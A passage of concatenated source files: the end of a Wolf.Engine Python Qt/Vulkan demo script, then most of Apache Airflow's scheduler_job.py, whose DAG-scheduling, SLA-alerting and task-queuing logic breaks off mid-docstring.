if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line.release()
self._shape_line = None
self._shape_triangle.release()
self._shape_triangle = None
self._shape_circle.release()
self._shape_circle = None
self._shape_box.release()
self._shape_box = None
self._shape_sphere.release()
self._shape_sphere = None
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
_app = QApplication(sys.argv)
#Init gui
_gui = gui()
_gui.resize(screen_width /2, screen_height /2)
_gui.setWindowTitle('Wolf.Engine Debug')
#Init scene
_scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_11_pipeline")
_scene.resize(screen_width, screen_height)
_scene.setWindowTitle('Wolf.Engine')
#Show all widgets
_scene.show()
_gui.show()
sys.exit(_app.exec_())
|
scheduler_job.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import executors, models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessor, DagFileProcessorAgent, SimpleDag, SimpleDagBag, SimpleTaskInstance,
list_py_file_paths,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_state: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
